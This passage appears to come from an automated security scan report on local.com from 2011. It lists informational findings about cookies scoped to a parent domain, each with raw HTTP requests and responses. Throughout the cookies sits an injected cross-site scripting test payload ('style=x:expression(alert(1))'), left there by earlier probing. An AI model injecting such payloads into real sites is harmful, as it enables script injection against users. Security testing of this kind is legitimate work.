Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...

7.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...

7.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...

7.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...

7.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...

7.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...

7.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...

7.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...

7.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...

7.13. http://www.local.com/business/results/  previous  next

Summary

Severity:   Information
